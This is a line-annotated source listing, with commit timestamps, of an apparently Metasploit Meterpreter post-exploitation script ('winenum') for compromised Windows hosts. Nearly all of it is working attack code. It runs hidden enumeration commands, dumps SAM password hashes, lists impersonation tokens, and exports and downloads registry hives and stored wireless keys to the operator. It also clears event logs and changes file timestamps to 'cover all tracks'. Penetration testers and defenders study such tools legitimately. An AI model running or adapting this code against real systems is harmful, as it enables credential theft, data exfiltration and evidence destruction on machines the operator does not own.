2009-10-26 15:14:28 +00:00
|
|
|
# $Id$
|
2009-01-08 18:14:03 +00:00
|
|
|
#
|
|
|
|
#Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
|
2009-05-15 04:24:20 +00:00
|
|
|
# and Windows XP targets using native windows commands.
|
2009-01-08 18:14:03 +00:00
|
|
|
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
2009-05-15 04:24:20 +00:00
|
|
|
#Verion: 0.3.4
|
2009-01-08 18:14:03 +00:00
|
|
|
#Note: Compleatly re-writen to make it modular and better error handling.
|
|
|
|
# Working on adding more Virtual Machine Checks and looking at improving
|
|
|
|
# the code but retain the independance of each module so it is easier for
|
|
|
|
# the code to be re-used.
|
|
|
|
#Contributor: natron (natron 0x40 invisibledenizen 0x2E com) (Process Migration Functions)
|
|
|
|
################## Variable Declarations ##################
|
2009-11-05 00:40:19 +00:00
|
|
|
|
|
|
|
opts = Rex::Parser::Arguments.new(
|
|
|
|
"-h" => [ false, "Help menu." ],
|
|
|
|
"-m" => [ false, "Migrate the Meterpreter Session from it current process to a new cmd.exe before doing anything" ],
|
|
|
|
"-r" => [ false, "Dump, compress and download entire Registry" ],
|
|
|
|
"-c" => [ false, "Change Access, Modified and Created times of executables that were run on the target machine and clear the EventLog" ]
|
|
|
|
)
|
|
|
|
|
|
|
|
rd = nil
|
|
|
|
mg = nil
|
|
|
|
cm = nil
|
|
|
|
opts.parse(args) { |opt, idx, val|
|
|
|
|
case opt
|
|
|
|
when '-r'
|
|
|
|
rd = 1
|
|
|
|
when '-m'
|
|
|
|
mg = 1
|
|
|
|
when '-c'
|
|
|
|
cm = 1
|
|
|
|
when "-h"
|
|
|
|
print_line "WinEnum -- Windows local enumeration"
|
|
|
|
print_line
|
|
|
|
print_line "Retrieves all kinds of information about the system"
|
|
|
|
print_line "including environment variables, network interfaces,"
|
|
|
|
print_line "routing, user accounts, and much more. Results are"
|
|
|
|
print_line "stored in #{::File.join(Msf::Config.log_directory, 'winenum')}"
|
|
|
|
print_line(opts.usage)
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
|
|
}
|
|
|
|
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
|
2009-01-08 18:14:03 +00:00
|
|
|
session = client
|
|
|
|
host,port = session.tunnel_peer.split(':')
|
|
|
|
|
|
|
|
# Create Filename info to be appended to downloaded files
|
2009-03-25 03:13:54 +00:00
|
|
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+"-"+sprintf("%.5d",rand(100000))
|
2009-01-08 18:14:03 +00:00
|
|
|
|
|
|
|
# Create a directory for the logs
|
2009-11-05 00:40:19 +00:00
|
|
|
logs = ::File.join(Msf::Config.log_directory, 'winenum', host + filenameinfo )
|
2009-01-08 18:14:03 +00:00
|
|
|
|
|
|
|
# Create the log directory
|
|
|
|
::FileUtils.mkdir_p(logs)
|
|
|
|
|
|
|
|
#logfile name
|
|
|
|
dest = logs + "/" + host + filenameinfo + ".txt"
|
|
|
|
|
|
|
|
# Commands that will be ran on the Target
|
|
|
|
commands = [
|
|
|
|
'cmd.exe /c set',
|
|
|
|
'arp -a',
|
|
|
|
'ipconfig /all',
|
|
|
|
'ipconfig /displaydns',
|
|
|
|
'route print',
|
|
|
|
'net view',
|
2009-01-30 06:18:02 +00:00
|
|
|
'netstat -nao',
|
|
|
|
'netstat -vb',
|
2009-01-08 18:14:03 +00:00
|
|
|
'netstat -ns',
|
|
|
|
'net accounts',
|
2009-01-30 06:18:02 +00:00
|
|
|
'net accounts /domain',
|
|
|
|
'net session',
|
2009-01-08 18:14:03 +00:00
|
|
|
'net share',
|
|
|
|
'net group',
|
|
|
|
'net user',
|
|
|
|
'net localgroup',
|
2009-01-30 06:18:02 +00:00
|
|
|
'net localgroup administrators',
|
|
|
|
'net group administrators',
|
2009-01-08 18:14:03 +00:00
|
|
|
'net view /domain',
|
|
|
|
'netsh firewall show config',
|
2009-03-25 03:13:54 +00:00
|
|
|
'tasklist /svc',
|
2009-05-22 02:33:33 +00:00
|
|
|
'tasklist /m',
|
|
|
|
'gpresult /SCOPE COMPUTER /Z',
|
|
|
|
'gpresult /SCOPE USER /Z'
|
2009-03-25 03:13:54 +00:00
|
|
|
]
|
|
|
|
# Windows 2008 Commands
|
|
|
|
win2k8cmd = [
|
2009-05-22 02:33:33 +00:00
|
|
|
'servermanagercmd.exe -q',
|
|
|
|
'cscript /nologo winrm get winrm/config',
|
2009-01-08 18:14:03 +00:00
|
|
|
]
|
|
|
|
# Commands wich MACE will be changed
|
|
|
|
cmdstomp = [
|
|
|
|
'cmd.exe',
|
|
|
|
'reg.exe',
|
|
|
|
'ipconfig.exe',
|
|
|
|
'route.exe',
|
|
|
|
'net.exe',
|
|
|
|
'netstat.exe',
|
|
|
|
'netsh.exe',
|
|
|
|
'makecab.exe',
|
|
|
|
'tasklist.exe',
|
|
|
|
'wbem\\wmic.exe',
|
2009-05-22 02:33:33 +00:00
|
|
|
'gpresult.exe'
|
2009-05-15 04:24:20 +00:00
|
|
|
]
|
2009-01-08 18:14:03 +00:00
|
|
|
# WMIC Commands that will be executed on the Target
|
|
|
|
wmic = [
|
2009-03-25 03:13:54 +00:00
|
|
|
'computersystem list brief',
|
2009-01-08 18:14:03 +00:00
|
|
|
'useraccount list',
|
2009-01-30 06:18:02 +00:00
|
|
|
'group list',
|
2009-01-08 18:14:03 +00:00
|
|
|
'service list brief',
|
|
|
|
'volume list brief',
|
2009-03-25 03:13:54 +00:00
|
|
|
'logicaldisk get description,filesystem,name,size',
|
|
|
|
'netlogin get name,lastlogon,badpasswordcount',
|
|
|
|
'netclient list brief',
|
|
|
|
'netuse get name,username,connectiontype,localname',
|
|
|
|
'share get name,path',
|
|
|
|
'nteventlog get path,filename,writeable',
|
2009-01-08 18:14:03 +00:00
|
|
|
'process list brief',
|
|
|
|
'startup list full',
|
2009-01-30 06:18:02 +00:00
|
|
|
'rdtoggle list',
|
2009-03-25 03:13:54 +00:00
|
|
|
'product get name,version',
|
2009-01-08 18:14:03 +00:00
|
|
|
'qfe',
|
|
|
|
]
|
|
|
|
#Specific Commands for Windows vista for Wireless Enumeration
|
|
|
|
vstwlancmd = [
|
|
|
|
'netsh wlan show interfaces',
|
|
|
|
'netsh wlan show drivers',
|
|
|
|
'netsh wlan show profiles',
|
|
|
|
'netsh wlan show networks mode=bssid',
|
|
|
|
]
|
|
|
|
# Commands that are not present in Windows 2000
|
|
|
|
nonwin2kcmd = [
|
|
|
|
'netsh firewall show config',
|
|
|
|
'tasklist /svc',
|
2009-05-22 02:33:33 +00:00
|
|
|
'gpresult /SCOPE COMPUTER /Z',
|
|
|
|
'gpresult /SCOPE USER /Z',
|
2009-05-15 04:24:20 +00:00
|
|
|
'prnport -l',
|
|
|
|
'prnmngr -g',
|
2009-01-08 18:14:03 +00:00
|
|
|
'tasklist.exe',
|
|
|
|
'wbem\\wmic.exe',
|
|
|
|
'netsh.exe',
|
|
|
|
]
|
2009-01-30 06:18:02 +00:00
|
|
|
# Executables not pressent in Windows 2000
|
|
|
|
nowin2kexe = [
|
|
|
|
'netsh.exe',
|
2009-05-22 02:33:33 +00:00
|
|
|
'gpresult.exe',
|
2009-01-30 06:18:02 +00:00
|
|
|
'tasklist.exe',
|
|
|
|
'wbem\\wmic.exe',
|
|
|
|
]
|
2009-01-08 18:14:03 +00:00
|
|
|
################## Function Declarations ##################
|
|
|
|
|
|
|
|
# Function to check if Target Machine a VM
|
|
|
|
# Note: will add soon Hyper-v and Citrix Xen check.
|
|
|
|
def chkvm(session)
|
|
|
|
check = nil
|
|
|
|
vmout = ''
|
|
|
|
info = session.sys.config.sysinfo
|
|
|
|
print_status "Checking if #{info['Computer']} is a Virtual Machine ........"
|
2009-05-15 04:24:20 +00:00
|
|
|
|
|
|
|
# Check for Target Machines if running in VM, only fo VMware Workstation/Fusion
|
2009-01-08 18:14:03 +00:00
|
|
|
begin
|
|
|
|
key = 'HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS'
|
|
|
|
root_key, base_key = session.sys.registry.splitkey(key)
|
|
|
|
open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
|
|
|
|
v = open_key.query_value('SystemManufacturer')
|
2009-05-15 04:24:20 +00:00
|
|
|
sysmnfg = v.data.downcase
|
|
|
|
if sysmnfg =~ /vmware/
|
2009-01-08 18:14:03 +00:00
|
|
|
print_status "\tThis is a VMware Workstation/Fusion Virtual Machine"
|
|
|
|
vmout << "This is a VMware Workstation/Fusion Virtual Machine\n\n"
|
|
|
|
check = 1
|
2009-05-15 04:24:20 +00:00
|
|
|
elsif sysmnfg =~ /xen/
|
|
|
|
print_status("\tThis is a Xen Virtual Machine.")
|
|
|
|
check = 1
|
2009-01-08 18:14:03 +00:00
|
|
|
end
|
2009-05-15 04:24:20 +00:00
|
|
|
rescue
|
|
|
|
print_status("BIOS Check Failed")
|
2009-01-08 18:14:03 +00:00
|
|
|
|
|
|
|
end
|
2009-05-15 04:24:20 +00:00
|
|
|
if check != 1
|
2009-01-08 18:14:03 +00:00
|
|
|
begin
|
2009-05-15 04:24:20 +00:00
|
|
|
#Registry path using the HD and CD rom entries in the registry in case propirtary tools are
|
|
|
|
#not installed.
|
|
|
|
key2 = "HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0"
|
|
|
|
root_key2, base_key2 = session.sys.registry.splitkey(key2)
|
|
|
|
open_key2 = session.sys.registry.open_key(root_key2,base_key2,KEY_READ)
|
|
|
|
v2 = open_key2.query_value('Identifier')
|
|
|
|
|
2009-06-20 16:15:46 +00:00
|
|
|
if v2.data.downcase =~ /vmware/
|
2009-05-15 04:24:20 +00:00
|
|
|
print_status "\tThis is a VMWare virtual Machine"
|
|
|
|
vmout << "This is a VMWare virtual Machine\n\n"
|
2009-06-20 16:15:46 +00:00
|
|
|
elsif v2.data =~ /vbox/
|
2009-05-15 04:24:20 +00:00
|
|
|
print_status "\tThis is a Sun VirtualBox virtual Machine"
|
|
|
|
vmout << "This is a Sun VirtualBox virtual Machine\n\n"
|
2009-06-20 16:15:46 +00:00
|
|
|
elsif v2.data.downcase =~ /xen/
|
2009-05-15 04:24:20 +00:00
|
|
|
print_status "\tThis is a Xen virtual Machine"
|
|
|
|
vmout << "This is a Xen virtual Machine\n\n"
|
2009-06-20 16:15:46 +00:00
|
|
|
elsif v2.data.downcase =~ /virtual hd/
|
2009-05-15 04:24:20 +00:00
|
|
|
print_status "\tThis is a Hyper-V/Virtual Server virtual Machine"
|
|
|
|
vmout << "This is a Hyper-v/Virtual Server virtual Machine\n\n"
|
|
|
|
end
|
2009-01-08 18:14:03 +00:00
|
|
|
rescue::Exception => e
|
2009-05-15 04:24:20 +00:00
|
|
|
print_status("#{e.class} #{e}")
|
2009-01-08 18:14:03 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
vmout
|
|
|
|
end
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
|
|
|
|
# Function for running a list a commands stored in a array, returs string
|
|
|
|
def list_exec(session,cmdlst)
|
|
|
|
print_status("Running Command List ...")
|
|
|
|
tmpout = ""
|
|
|
|
cmdout = ""
|
|
|
|
r=''
|
2009-05-22 02:33:33 +00:00
|
|
|
session.response_timeout=120
|
2009-01-08 18:14:03 +00:00
|
|
|
cmdlst.each do |cmd|
|
|
|
|
begin
|
2009-05-15 04:24:20 +00:00
|
|
|
print_status "\trunning command #{cmd}"
|
|
|
|
tmpout = ""
|
|
|
|
tmpout << "*****************************************\n"
|
|
|
|
tmpout << " Output of #{cmd}\n"
|
|
|
|
tmpout << "*****************************************\n"
|
|
|
|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
|
|
|
while(d = r.channel.read)
|
2009-01-08 18:14:03 +00:00
|
|
|
|
2009-05-15 04:24:20 +00:00
|
|
|
tmpout << d
|
|
|
|
end
|
|
|
|
cmdout << tmpout
|
|
|
|
r.channel.close
|
|
|
|
r.close
|
2009-01-08 18:14:03 +00:00
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("Error Running Command #{cmd}: #{e.class} #{e}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
cmdout
|
|
|
|
end
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
# Function for running a list of WMIC commands stored in a array, returs string
|
|
|
|
def wmicexec(session,wmiccmds= nil)
|
|
|
|
print_status("Running WMIC Commands ....")
|
|
|
|
windr = ''
|
|
|
|
tmpout = ''
|
|
|
|
windrtmp = ""
|
2009-05-22 02:33:33 +00:00
|
|
|
session.response_timeout=120
|
2009-01-08 18:14:03 +00:00
|
|
|
begin
|
2009-05-15 04:24:20 +00:00
|
|
|
tmp = session.fs.file.expand_path("%TEMP%")
|
|
|
|
wmicfl = tmp + "\\wmictmp.txt"
|
|
|
|
wmiccmds.each do |wmi|
|
|
|
|
print_status "\trunning command wmic #{wmi}"
|
|
|
|
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
|
|
|
sleep(1)
|
|
|
|
r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
|
|
|
sleep(1)
|
|
|
|
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
|
|
|
sleep(1)
|
|
|
|
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
|
|
|
|
sleep(2)
|
|
|
|
#Making sure that wmic finnishes before executing next wmic command
|
|
|
|
prog2check = "wmic.exe"
|
|
|
|
found = 0
|
|
|
|
while found == 0
|
|
|
|
session.sys.process.get_processes().each do |x|
|
|
|
|
found =1
|
|
|
|
if prog2check == (x['name'].downcase)
|
|
|
|
sleep(0.5)
|
|
|
|
found = 0
|
|
|
|
end
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
|
|
|
end
|
2009-05-15 04:24:20 +00:00
|
|
|
r.close
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
2009-05-15 04:24:20 +00:00
|
|
|
# Read the output file of the wmic commands
|
|
|
|
wmioutfile = session.fs.file.new(wmicfl, "rb")
|
|
|
|
until wmioutfile.eof?
|
|
|
|
tmpout << wmioutfile.read
|
|
|
|
end
|
|
|
|
wmioutfile.close
|
2009-01-08 18:14:03 +00:00
|
|
|
rescue ::Exception => e
|
2009-05-15 04:24:20 +00:00
|
|
|
print_status("Error running WMIC commands: #{e.class} #{e}")
|
2009-01-08 18:14:03 +00:00
|
|
|
end
|
|
|
|
# We delete the file with the wmic command output.
|
|
|
|
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
|
|
|
|
c.close
|
|
|
|
tmpout
|
|
|
|
end
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
#Function for getting the NTLM and LANMAN hashes out of a system
|
|
|
|
def gethash(session)
|
|
|
|
print_status("Dumping password hashes...")
|
|
|
|
begin
|
|
|
|
hash = ''
|
|
|
|
session.core.use("priv")
|
|
|
|
hashes = session.priv.sam_hashes
|
|
|
|
hash << "****************************\n"
|
|
|
|
hash << " Dumped Password Hashes\n"
|
|
|
|
hash << "****************************\n\n"
|
|
|
|
hashes.each do |h|
|
|
|
|
hash << h.to_s+"\n"
|
|
|
|
end
|
|
|
|
hash << "\n\n\n"
|
|
|
|
print_status("Hashes Dumped")
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("\tError dumping hashes: #{e.class} #{e}")
|
|
|
|
print_status("\tPayload may be running with insuficient privileges!")
|
|
|
|
end
|
|
|
|
hash
|
|
|
|
|
|
|
|
end
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
#Function that uses the incognito fetures to list tokens on the system that can be used
|
|
|
|
def listtokens(session)
|
|
|
|
begin
|
|
|
|
print_status("Getting Tokens...")
|
|
|
|
dt = ''
|
|
|
|
session.core.use("incognito")
|
|
|
|
i = 0
|
|
|
|
dt << "****************************\n"
|
|
|
|
dt << " List of Available Tokens\n"
|
|
|
|
dt << "****************************\n\n"
|
|
|
|
while i < 2
|
|
|
|
tokens = session.incognito.incognito_list_tokens(i)
|
|
|
|
if i == 0
|
|
|
|
tType = "User"
|
|
|
|
else
|
|
|
|
tType = "Group"
|
|
|
|
end
|
|
|
|
dt << "#{tType} Delegation Tokens Available \n"
|
|
|
|
dt << "======================================== \n"
|
|
|
|
|
2009-06-20 16:15:46 +00:00
|
|
|
tokens['delegation'].each_line{ |string|
|
2009-01-08 18:14:03 +00:00
|
|
|
dt << string + "\n"
|
2009-05-15 04:24:20 +00:00
|
|
|
}
|
2009-01-08 18:14:03 +00:00
|
|
|
|
|
|
|
dt << "\n"
|
|
|
|
dt << "#{tType} Impersonation Tokens Available \n"
|
|
|
|
dt << "======================================== \n"
|
|
|
|
|
2009-06-20 16:15:46 +00:00
|
|
|
tokens['impersonation'].each_line{ |string|
|
2009-01-08 18:14:03 +00:00
|
|
|
dt << string + "\n"
|
2009-05-15 04:24:20 +00:00
|
|
|
}
|
2009-01-08 18:14:03 +00:00
|
|
|
i += 1
|
|
|
|
break if i == 2
|
|
|
|
end
|
|
|
|
print_status("All tokens have been processed")
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("Error Getting Tokens: #{e.class} #{e}")
|
|
|
|
end
|
|
|
|
dt
|
|
|
|
|
|
|
|
end
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
# Function for clearing all eventlogs
|
|
|
|
def clrevtlgs(session)
|
|
|
|
evtlogs = [
|
|
|
|
'security',
|
|
|
|
'system',
|
|
|
|
'application',
|
|
|
|
'directory service',
|
|
|
|
'dns server',
|
|
|
|
'file replication service'
|
2009-05-15 04:24:20 +00:00
|
|
|
]
|
2009-01-08 18:14:03 +00:00
|
|
|
print_status("Clearing Event Logs, this will leave and event 517")
|
|
|
|
begin
|
2009-05-15 04:24:20 +00:00
|
|
|
evtlogs.each do |evl|
|
|
|
|
print_status("\tClearing the #{evl} Event Log")
|
|
|
|
log = session.sys.eventlog.open(evl)
|
|
|
|
log.clear
|
|
|
|
end
|
|
|
|
print_status("Alll Event Logs have been cleared")
|
2009-01-08 18:14:03 +00:00
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("Error clearing Event Log: #{e.class} #{e}")
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
# Function for Changing Access Time, Modified Time and Created Time of Files Supplied in an Array
|
|
|
|
# The files have to be in %WinDir%\System32 folder.
|
|
|
|
def chmace(session,cmds)
|
|
|
|
windir = ''
|
|
|
|
windrtmp = ""
|
|
|
|
print_status("Changing Access Time, Modified Time and Created Time of Files Used")
|
|
|
|
windir = session.fs.file.expand_path("%WinDir%")
|
|
|
|
cmds.each do |c|
|
2009-05-15 04:24:20 +00:00
|
|
|
begin
|
|
|
|
session.core.use("priv")
|
|
|
|
filetostomp = windir + "\\system32\\"+ c
|
|
|
|
fl2clone = windir + "\\system32\\chkdsk.exe"
|
|
|
|
print_status("\tChanging file MACE attributes on #{filetostomp}")
|
|
|
|
session.priv.fs.set_file_mace_from_file(filetostomp, fl2clone)
|
2009-01-08 18:14:03 +00:00
|
|
|
|
2009-05-15 04:24:20 +00:00
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("Error changing MACE: #{e.class} #{e}")
|
|
|
|
end
|
2009-01-08 18:14:03 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
#Dumping and Downloading the Registry of the target machine
|
|
|
|
def regdump(session,pathoflogs,filename)
|
|
|
|
host,port = session.tunnel_peer.split(':')
|
|
|
|
#This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
|
|
|
|
garbage = ''
|
|
|
|
windrtmp = ''
|
|
|
|
hives = %w{HKCU HKLM HKCC HKCR HKU}
|
|
|
|
windir = session.fs.file.expand_path("%WinDir%")
|
|
|
|
print_status('Dumping and Downloading the Registry')
|
2009-06-20 16:15:46 +00:00
|
|
|
hives.each_line do |hive|
|
2009-05-15 04:24:20 +00:00
|
|
|
begin
|
|
|
|
print_status("\tExporting #{hive}")
|
|
|
|
r = session.sys.process.execute("cmd.exe /c reg.exe export #{hive} #{windir}\\Temp\\#{hive}#{filename}.reg", nil, {'Hidden' => 'true','Channelized' => true})
|
|
|
|
while(d = r.channel.read)
|
|
|
|
garbage << d
|
|
|
|
end
|
|
|
|
r.channel.close
|
|
|
|
r.close
|
|
|
|
print_status("\tCompressing #{hive} into cab file for faster download")
|
|
|
|
r = session.sys.process.execute("cmd.exe /c makecab #{windir}\\Temp\\#{hive}#{filename}.reg #{windir}\\Temp\\#{hive}#{filename}.cab", nil, {'Hidden' => 'true','Channelized' => true})
|
|
|
|
while(d = r.channel.read)
|
|
|
|
garbage << d
|
|
|
|
end
|
|
|
|
r.channel.close
|
|
|
|
r.close
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("Error dumping Registry Hives #{e.class} #{e}")
|
2009-01-08 18:14:03 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
#Downloading Compresed registry Hives
|
2009-06-20 16:15:46 +00:00
|
|
|
hives.each_line do |hive|
|
2009-05-15 04:24:20 +00:00
|
|
|
begin
|
|
|
|
print_status("\tDownloading #{hive}#{filename}.cab to -> #{pathoflogs}/#{host}-#{hive}#{filename}.cab")
|
|
|
|
session.fs.file.download_file("#{pathoflogs}/#{host}-#{hive}#{filename}.cab", "#{windir}\\Temp\\#{hive}#{filename}.cab")
|
|
|
|
sleep(5)
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("Error Downloading Registry Hives #{e.class} #{e}")
|
|
|
|
end
|
2009-01-08 18:14:03 +00:00
|
|
|
end
|
|
|
|
#Deleting left over files
|
|
|
|
print_status("\tDeleting left over files")
|
|
|
|
session.sys.process.execute("cmd.exe /c del #{windir}\\Temp\\HK*", nil, {'Hidden' => 'true'})
|
|
|
|
|
|
|
|
end
|
2009-03-25 03:13:54 +00:00
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
# Function for extracting program list from registry
|
|
|
|
def findprogs(session)
|
|
|
|
print_status("Extracting software list from registry")
|
|
|
|
proglist = ""
|
|
|
|
session.sys.registry.create_key(HKEY_CURRENT_USER, 'Software').each_key() do |company|
|
2009-05-15 04:24:20 +00:00
|
|
|
proglist << "#{company}"
|
2009-03-25 03:13:54 +00:00
|
|
|
|
|
|
|
session.sys.registry.create_key(HKEY_CURRENT_USER, "Software\\#{company}").each_key() do |software|
|
2009-05-15 04:24:20 +00:00
|
|
|
proglist << "\t#{software}"
|
2009-03-25 03:13:54 +00:00
|
|
|
end
|
|
|
|
end
|
2009-05-15 04:24:20 +00:00
|
|
|
print_status("Finnished Extraction of software list from registry")
|
2009-03-25 03:13:54 +00:00
|
|
|
proglist
|
|
|
|
end
|
|
|
|
|
2009-01-08 18:14:03 +00:00
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
# Function that will call 2 other Functions to cover all tracks
|
|
|
|
def covertracks(session,cmdstomp)
|
|
|
|
clrevtlgs(session)
|
|
|
|
info = session.sys.config.sysinfo
|
2009-06-20 16:15:46 +00:00
|
|
|
trgtos = info['OS']
|
2009-01-08 18:14:03 +00:00
|
|
|
if trgtos =~ /(Windows 2000)/
|
|
|
|
chmace(session,cmdstomp - nonwin2kcmd)
|
|
|
|
else
|
|
|
|
chmace(session,cmdstomp)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
# Function for writing results of other functions to a file
|
|
|
|
def filewrt(file2wrt, data2wrt)
|
|
|
|
output = ::File.open(file2wrt, "a")
|
2009-06-20 16:15:46 +00:00
|
|
|
data2wrt.each_line do |d|
|
2009-01-08 18:14:03 +00:00
|
|
|
output.puts(d)
|
|
|
|
end
|
|
|
|
output.close
|
|
|
|
end
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
|
|
|
|
# Function for dumping Registry keys that contain wireless configuration settings for Vista and XP
|
|
|
|
# This keys can later be imported into a Windows client for conection or key extraction.
|
|
|
|
def dumpwlankeys(session,pathoflogs,filename)
|
|
|
|
host,port = session.tunnel_peer.split(':')
|
|
|
|
#This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
|
|
|
|
garbage = ''
|
|
|
|
windrtmp = ''
|
2009-05-16 21:24:33 +00:00
|
|
|
windir = session.fs.file.expand_path("%TEMP%")
|
2009-01-08 18:14:03 +00:00
|
|
|
print_status('Dumping and Downloading the Registry entries for Configured Wireless Networks')
|
|
|
|
xpwlan = "HKLM\\Software\\Microsoft\\WZCSVC\\Parameters\\Interfaces"
|
2009-05-16 21:24:33 +00:00
|
|
|
vswlan = "HKLM\\Software\\Microsoft\\Wlansvc"
|
2009-01-08 18:14:03 +00:00
|
|
|
info = session.sys.config.sysinfo
|
|
|
|
trgtos = info['OS']
|
|
|
|
if trgtos =~ /(Windows XP)/
|
|
|
|
key = xpwlan
|
|
|
|
elsif trgtos =~ /(Windows Vista)/
|
|
|
|
key = vswlan
|
|
|
|
end
|
|
|
|
begin
|
|
|
|
print_status("\tExporting #{key}")
|
2009-05-16 21:24:33 +00:00
|
|
|
r = session.sys.process.execute("reg export \"#{key}\" #{windir}\\wlan#{filename}.reg", nil, {'Hidden' => 'true','Channelized' => true})
|
2009-01-08 18:14:03 +00:00
|
|
|
while(d = r.channel.read)
|
|
|
|
garbage << d
|
|
|
|
end
|
2009-05-16 21:24:33 +00:00
|
|
|
sleep(2)
|
2009-01-08 18:14:03 +00:00
|
|
|
r.channel.close
|
|
|
|
r.close
|
|
|
|
print_status("\tCompressing key into cab file for faster download")
|
2009-05-16 21:24:33 +00:00
|
|
|
r = session.sys.process.execute("cmd.exe /c makecab #{windir}\\wlan#{filename}.reg #{windir}\\wlan#{filename}.cab", nil, {'Hidden' => 'true','Channelized' => true})
|
2009-01-08 18:14:03 +00:00
|
|
|
while(d = r.channel.read)
|
|
|
|
garbage << d
|
|
|
|
end
|
|
|
|
r.channel.close
|
|
|
|
r.close
|
|
|
|
rescue ::Exception => e
|
2009-05-15 04:24:20 +00:00
|
|
|
print_status("Error dumping Registry keys #{e.class} #{e}")
|
2009-01-08 18:14:03 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#Downloading Compresed registry keys
|
|
|
|
|
|
|
|
begin
|
|
|
|
print_status("\tDownloading wlan#{filename}.cab to -> #{pathoflogs}/wlan#{filename}.cab")
|
2009-05-16 21:24:33 +00:00
|
|
|
session.fs.file.download_file("#{pathoflogs}/wlan#{filename}.cab", "#{windir}\\wlan#{filename}.cab")
|
2009-01-08 18:14:03 +00:00
|
|
|
sleep(5)
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("Error Downloading Registry keys #{e.class} #{e}")
|
|
|
|
end
|
|
|
|
#Deleting left over files
|
|
|
|
print_status("\tDeleting left over files")
|
2009-05-16 21:24:33 +00:00
|
|
|
#session.sys.process.execute("cmd.exe /c del #{windir}\\wlan*", nil, {'Hidden' => 'true'})
|
2009-01-08 18:14:03 +00:00
|
|
|
|
|
|
|
end
|
|
|
|
# Functions Provided by natron (natron 0x40 invisibledenizen 0x2E com)
|
|
|
|
# for Process Migration
|
|
|
|
#---------------------------------------------------------------------------------------------------------
|
|
|
|
def launchProc(session,target)
|
|
|
|
print_status("Launching hidden #{target}...")
|
|
|
|
|
|
|
|
# Set the vars; these can of course be modified if need be
|
|
|
|
cmd_exec = target
|
|
|
|
cmd_args = nil
|
|
|
|
hidden = true
|
|
|
|
channelized = nil
|
|
|
|
use_thread_token = false
|
|
|
|
|
|
|
|
# Launch new process
|
|
|
|
newproc = session.sys.process.execute(cmd_exec, cmd_args,
|
2009-05-15 04:24:20 +00:00
|
|
|
'Channelized' => channelized,
|
|
|
|
'Hidden' => hidden,
|
|
|
|
'InMemory' => nil,
|
|
|
|
'UseThreadToken' => use_thread_token)
|
2009-01-08 18:14:03 +00:00
|
|
|
|
|
|
|
print_status("Process #{newproc.pid} created.")
|
|
|
|
|
|
|
|
return newproc
|
|
|
|
end
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def migrateToProc(session,newproc)
|
|
|
|
# Grab the current pid info
|
|
|
|
server = session.sys.process.open
|
|
|
|
print_status("Current process is #{server.name} (#{server.pid}). Migrating to #{newproc.pid}.")
|
|
|
|
|
|
|
|
# Save the old process info so we can kill it after migration.
|
|
|
|
oldproc = server.pid
|
|
|
|
|
|
|
|
# Do the migration
|
|
|
|
session.core.migrate(newproc.pid.to_i)
|
|
|
|
|
|
|
|
print_status("Migration completed successfully.")
|
|
|
|
|
|
|
|
# Grab new process info
|
|
|
|
server = session.sys.process.open
|
|
|
|
|
|
|
|
print_status("New server process: #{server.name} (#{server.pid})")
|
|
|
|
|
|
|
|
return oldproc
|
|
|
|
end
|
|
|
|
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def killApp(session,procpid)
|
|
|
|
session.sys.process.kill(procpid)
|
|
|
|
print_status("Old process #{procpid} killed.")
|
|
|
|
end
|
|
|
|
|
|
|
|
#---------------------------------------------------------------------------------------------------------
|
|
|
|
# Function to execute process migration
|
|
|
|
def migrate(session)
|
|
|
|
target = 'cmd.exe'
|
|
|
|
newProcPid = launchProc(session,target)
|
|
|
|
oldProc = migrateToProc(session,newProcPid)
|
|
|
|
#killApp(oldProc)
|
|
|
|
#Dangerous depending on the service exploited
|
|
|
|
end
|
2009-07-26 17:31:32 +00:00
|
|
|
